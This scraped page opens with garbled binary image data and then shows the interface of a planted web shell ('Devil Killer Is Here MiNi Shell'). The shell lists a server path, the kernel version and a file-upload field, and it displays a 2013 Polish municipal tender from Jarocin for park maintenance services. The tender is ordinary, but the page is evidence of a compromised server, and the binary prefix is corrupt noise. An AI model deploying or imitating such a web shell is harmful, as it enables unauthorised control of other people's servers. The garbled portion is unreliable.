JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131220/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131220/278773-N-2013.html

<p class="kh_header"><b>Jarocin: Utrzymanie parków na terenie gminy Jarocin</b><br>
<b>Numer ogłoszenia: 278773 - 2013; data zamieszczenia: 20.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jarocin , Al. Niepodległości 10, 63-200 Jarocin, woj. wielkopolskie, tel. 62 7499500, faks 62 7472225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jarocin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie parków na terenie gminy Jarocin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie parków na terenie gminy Jarocin. Przedmiot zamówienia został podzielony na dwie części zamówienia.
Cześć zamówienia nr I: 
1. Park Miejski w Jarocinie o powierzchni 24,8 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 5 ha (koszenie - wysokość trawy na łące przed pałacem i terenach wokół dużego stawu i Skarbczyka nie może przekroczyć 10 cm, intensywność koszenia pozostałych trawników w parku będzie uzgadniana na bieżąco z Zamawiającym nie mniej jednak niż 3 razy w sezonie), 
b) cięciu i pielęgnacji żywopłotów (minimum 3 razy w sezonie),
c) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
d) dwukrotnym nasadzeniu kwiatów przed pałacem (kwiaty wiosenne i letnie),
e) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
f) pielęgnacji krzewów i rabat kwiatowych w tym również podlewania,
g) wykonaniu oprysków środkami ochrony roślin,
h) utrzymaniu czystości na stawach, tj. bieżące odławianie butelek, liści i innych odpadów,
i) konserwacji i bieżącym naprawianiu fontanny i oświetlenia, tj. montaż fontanny wiosną, demontaż fontanny jesienią, utrzymanie jej w sprawności technicznej, okresowe czyszczenie studni i dyszy, itp.,
j) wiosennym i jesiennym wygrabianiu liści w parku (trawniki, alejki i pozostałe tereny),
k) zamiataniu alei asfaltowych, schodów, chodników, gwarantującym czystość (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
l) utrzymaniu czystości na alejkach i trawnikach (grabienie, zamiatanie, sprzątanie odpadów z trawników i krzewów z częstotliwością gwarantującą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
ł) sprzątaniu terenu otaczającego amfiteatr wraz z widownią z częstotliwością zapewniającą czystość (minimum 2 razy w tygodniu) oraz koszeniu skarp amfiteatru - wysokość trawy nie może przekroczyć 10 cm,
m) bieżącym wyrównywaniu nawierzchni alejek parkowych,
n) w okresie zimowym na bieżącym odśnieżaniu i usuwaniu śliskości na chodnikach wokół Parku Miejskiego,
o) w okresie zimowym na bieżącym odśnieżaniu i posypywaniu piaskiem alei parkowych,
p) koszeniu i sprzątaniu pasów zieleni przylegających do Parku Miejskiego,
r) utrzymaniu czystości i porządku na placu zabaw,
s) wykonywaniu odpowiednich przerębli na stawie oraz ich zabezpieczaniu,
t) pracach innych tj. dodatkowych pracach porządkowych, konserwacji małej architektury, naprawie i malowaniu ławek, malowaniu mostków, okresowym czyszczeniu 3 studni wbudowanych w skarpę stawu,
u) myciu ławek (przynajmniej raz w miesiącu),
w) podlewaniu nowo nasadzonych drzew,
z) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

UWAGA: Park Miejski w Jarocinie wpisany jest do rejestru zabytków pod nr 393 A.

Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady komunalne zmieszane należy dostarczyć do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych( RIPOK) z siedzibą Witaszyczki 1a, 63-200 Jarocin.
Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady ulegające biodegradacji należy dostarczyć do Międzygminnej Kompostowni Osadów Ściekowych z siedzibą Cielcza, ul. Gajówka 1, 63-200 Jarocin.
Wykonawca zobowiązany jest do złożenia, Burmistrzowi Jarocina, do dnia 31 grudnia 2014 r., sprawozdania zawierającego informację o masie zebranych i przekazanych w okresie wykonywania przedmiotu umowy, odpadów komunalnych zmieszanych oraz odpadów ulegających biodegradacji do RIPOK w Witaszyczkach. 
Koszty związane z zagospodarowaniem odpadów w RIPOK w Witaszyczkach oraz w Międzygminnej Kompostowni Osadów Ściekowych w Cielczy ponosił będzie Zamawiający.

Część zamówienia nr II:
1. Park Zwycięstwa w Jarocinie o powierzchni około 0,25 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,2 ha (koszenie - wysokość trawy nie może przekroczyć 10 cm), 
b) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
c) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
d) wiosennym i jesiennym wygrabianiu liści,
e) zamiataniu chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
utrzymaniu czystości na trawnikach (sprzątanie odpadów z trawników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa , piątek),
g) pracach innych tj. dodatkowych pracach porządkowych, naprawie ławek i koszy parkowych,
h) myciu ławek i koszy (przynajmniej raz w miesiącu),
i) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

2. Park leśny przy ul. Wrocławskiej w Jarocinie o powierzchni około 4,3 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,45 ha  (koszenie - wysokość trawy nie może przekroczyć 10 cm), 
b) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
c) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
d) wiosennym i jesiennym wygrabianiu liści,
e) zamiataniu chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
f) zamiataniu i wygrabianiu terenu wokół ławek i koszy parkowych z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
g) utrzymaniu czystości na całym terenie parku (sprzątanie odpadów z terenów zielonych z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
h) utrzymaniu czystości i porządku na placu zabaw (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek
i) bieżącym utrzymaniu czystości na stawie i w cieku Lipinka (odławianie odpadów, odblokowywanie zatorów itp.),
j) pracach innych tj. dodatkowych pracach porządkowych, naprawie ławek i koszy parkowych,
k) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu,
l) myciu ławek i koszy (przynajmniej raz w miesiącu).
ł) w okresie zimowym na bieżącym odśnieżaniu i posypywaniu piaskiem alei parkowych oraz schodów.

3. Park przy Sanktuarium w Golinie o powierzchni około 0,8 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,6 ha (koszenie - wysokość trawy nie może przekroczyć  10 cm), 
b) wiosennym i jesiennym wygrabianiu liści,
c) cięciu i pielęgnacji krzewów, pielenie chwastów (minimum 3 razy w sezonie),
d) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów, cięcia pielęgnacyjne,
e) bieżącym pieleniu terenów porośniętych bylinami i roślinami cebulowymi,
f) kontroli nawadniania (włączanie, wyłączanie, ustawianie i regulacja),
g) zamiataniu chodników i usuwaniu z nich chwastów (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
h) opróżnianiu koszy parkowych (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
i) zbieraniu odpadów z całego terenu (minimum 2 razy w tygodniu tj. poniedziałek, piątek),
j) myciu i konserwacji koszy parkowych, ławek i tabliczek mosiężnych (przynajmniej raz w miesiącu),
k) bieżącym oczyszczaniu stawu i strumienia,
l) konserwacji pompy lamp oświetleniowych,
ł) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady komunalne zmieszane należy dostarczyć do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych( RIPOK) z siedzibą Witaszyczki 1a, 63-200 Jarocin.
Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady ulegające biodegradacji należy dostarczyć do Międzygminnej Kompostowni Osadów Ściekowych z siedzibą Cielcza, ul. Gajówka 1, 63-200 Jarocin.
Wykonawca zobowiązany jest do złożenia, Burmistrzowi Jarocina, do dnia 31 grudnia 2014 r., sprawozdania zawierającego informację o masie zebranych  i przekazanych w okresie wykonywania przedmiotu umowy, odpadów komunalnych zmieszanych oraz odpadów ulegających biodegradacji do RIPOK w Witaszyczkach. 
Koszty związane z zagospodarowaniem odpadów w RIPOK w Witaszyczkach oraz w Międzygminnej Kompostowni Osadów Ściekowych w Cielczy ponosił będzie Zamawiający..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ ZAMÓWIENIA NR 1 i 2

Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ ZAMÓWIENIA NR 1 i 2

Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ ZAMÓWIENIA NR 1 i 2

Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ ZAMÓWIENIA NR 1 i 2

Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ ZAMÓWIENIA NR 1 i 2

Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca przedłoży oświadczenie sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty (załącznik nr 1 A/B).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. 2013r., poz. 907 z późn. zm.) Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty w następujących przypadkach:
1)dopuszczalna jest zmiana umowy polegająca na zmianie terminu realizacji zamówienia w przypadku:
a)zaistnienia okoliczności zawartych w art. 67 ust. 1 pkt. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
b)z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
c)z powodu okoliczności siły wyższej, klęski żywiołowej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu, ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
4)dopuszczalna jest zmiana umowy polegająca na zmianie wynagrodzenia za przedmiot  zamówienia w przypadku  gdy ulegną zmianie powszechnie obowiązujące przepisy w zakresie wysokości stawki podatku od towarów i usług  na przedmiot świadczenia;
5)dopuszczalna jest zmiana umowy polegająca na zmianie danych Wykonawcy bez zmian samego Wykonawcy (np. zmiana siedziby, adresu, nazwy);
6)dopuszczalne są zmiany postanowień umowy, które wynikają  ze zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie postanowień umowy do nowego stanu prawnego;
7)dopuszczalna jest zmiana numeru rachunku bankowego Wykonawcy, podanego w umowie w przypadku zmiany rachunku bankowego Wykonawcy, na który następować ma zapłata wynagrodzenia za wykonanie przedmiotu niniejszego zamówienia;
8)	dopuszczalna jest zmiana umowy w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy;
9)dopuszczalna jest zmiana Podwykonawcy - Wykonawca może zmienić Podwykonawcę na prośbę samego Podwykonawcy oraz w przypadku nie wywiązywania się Podwykonawcy z powierzonych mu przez Wykonawcę części przedmiotu zamówienia objętego przedmiotem zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jarocin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędu Miejskiego w Jarocinie
Al. Niepodległości 10
63-200 Jarocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.01.2014 godzina 10:00, miejsce: Urząd Miejski w Jarocinie
Al. Niepodległości 10, pok. 32 (sekretariat)
63-200 Jarocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ ZAMÓWIENIA NR I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Park Miejski w Jarocinie o powierzchni 24,8 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 5 ha (koszenie - wysokość trawy na łące przed pałacem i terenach wokół dużego stawu i Skarbczyka nie może przekroczyć 10 cm, intensywność koszenia pozostałych trawników w parku będzie uzgadniana na bieżąco z Zamawiającym nie mniej jednak niż 3 razy w sezonie), 
b) cięciu i pielęgnacji żywopłotów (minimum 3 razy w sezonie),
c) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość (minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
d) dwukrotnym nasadzeniu kwiatów przed pałacem (kwiaty wiosenne i letnie),
e) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
f) pielęgnacji krzewów i rabat kwiatowych w tym również podlewania,
g) wykonaniu oprysków środkami ochrony roślin,
h) utrzymaniu czystości na stawach, tj. bieżące odławianie butelek, liści i innych odpadów,
i) konserwacji i bieżącym naprawianiu fontanny i oświetlenia, tj. montaż fontanny wiosną, demontaż fontanny jesienią, utrzymanie jej w sprawności technicznej, okresowe czyszczenie studni i dyszy, itp.,
j) wiosennym i jesiennym wygrabianiu liści w parku (trawniki, alejki i pozostałe tereny),
k) zamiataniu alei asfaltowych, schodów, chodników, gwarantującym czystość (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
l) utrzymaniu czystości na alejkach i trawnikach (grabienie, zamiatanie, sprzątanie odpadów z trawników i krzewów z częstotliwością gwarantującą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
ł) sprzątaniu terenu otaczającego amfiteatr wraz z widownią z częstotliwością zapewniającą czystość (minimum 2 razy w tygodniu) oraz koszeniu skarp amfiteatru - wysokość trawy nie może przekroczyć 10 cm,
m) bieżącym wyrównywaniu nawierzchni alejek parkowych,
n) w okresie zimowym na bieżącym odśnieżaniu i usuwaniu śliskości na chodnikach wokół Parku Miejskiego,
o) w okresie zimowym na bieżącym odśnieżaniu i posypywaniu piaskiem alei parkowych,
p) koszeniu i sprzątaniu pasów zieleni przylegających do Parku Miejskiego,
r) utrzymaniu czystości i porządku na placu zabaw,
s) wykonywaniu odpowiednich przerębli na stawie oraz ich zabezpieczaniu,
t) pracach innych tj. dodatkowych pracach porządkowych, konserwacji małej architektury, naprawie i malowaniu ławek, malowaniu mostków, okresowym czyszczeniu 3 studni wbudowanych w skarpę stawu,
u) myciu ławek (przynajmniej raz w miesiącu),
w) podlewaniu nowo nasadzonych drzew,
z) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

UWAGA: Park Miejski w Jarocinie wpisany jest do rejestru zabytków pod nr 393 A.

Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady komunalne zmieszane należy dostarczyć do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych( RIPOK) z siedzibą Witaszyczki 1a, 63-200 Jarocin.
Odpady zebrane i wytworzone podczas wykonywania przedmiotu zamówienia, tj. odpady ulegające biodegradacji należy dostarczyć do Międzygminnej Kompostowni Osadów Ściekowych z siedzibą Cielcza, ul. Gajówka 1, 63-200 Jarocin.
Wykonawca zobowiązany jest do złożenia, Burmistrzowi Jarocina, do dnia 31 grudnia 2014 r., sprawozdania zawierającego informację o masie zebranych i przekazanych w okresie wykonywania przedmiotu umowy, odpadów komunalnych zmieszanych oraz odpadów ulegających biodegradacji do RIPOK w Witaszyczkach. 
Koszty związane z zagospodarowaniem odpadów w RIPOK w Witaszyczkach oraz w Międzygminnej Kompostowni Osadów Ściekowych w Cielczy ponosił będzie Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.31.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ ZAMÓWIENIA NR II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Park Zwycięstwa w Jarocinie o powierzchni około 0,25 ha. Realizacja przedmiotu zamówienia polegać będzie na:
a) utrzymaniu i pielęgnacji trawników - ok. 0,2 ha (koszenie - wysokość trawy nie może przekroczyć 10 cm), 
b) opróżnianiu koszy na odpady z częstotliwością zapewniającą czystość minimum 3 x w tygodniu tj. poniedziałek, środa, piątek),
c) bieżącym usuwaniu suchych, zagrażających bezpieczeństwu konarów,
d) wiosennym i jesiennym wygrabianiu liści,
e) zamiataniu chodników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa, piątek),
utrzymaniu czystości na trawnikach (sprzątanie odpadów z trawników z częstotliwością zapewniającą czystość i bezpieczeństwo dla użytkowników (minimum 3 razy w tygodniu tj. poniedziałek, środa , piątek),
g) pracach innych tj. dodatkowych pracach porządkowych, naprawie ławek i koszy parkowych,
h) myciu ławek i koszy (przynajmniej raz w miesiącu),
i) informowaniu o powstałych zniszczeniach w wyniku aktów wandalizmu.

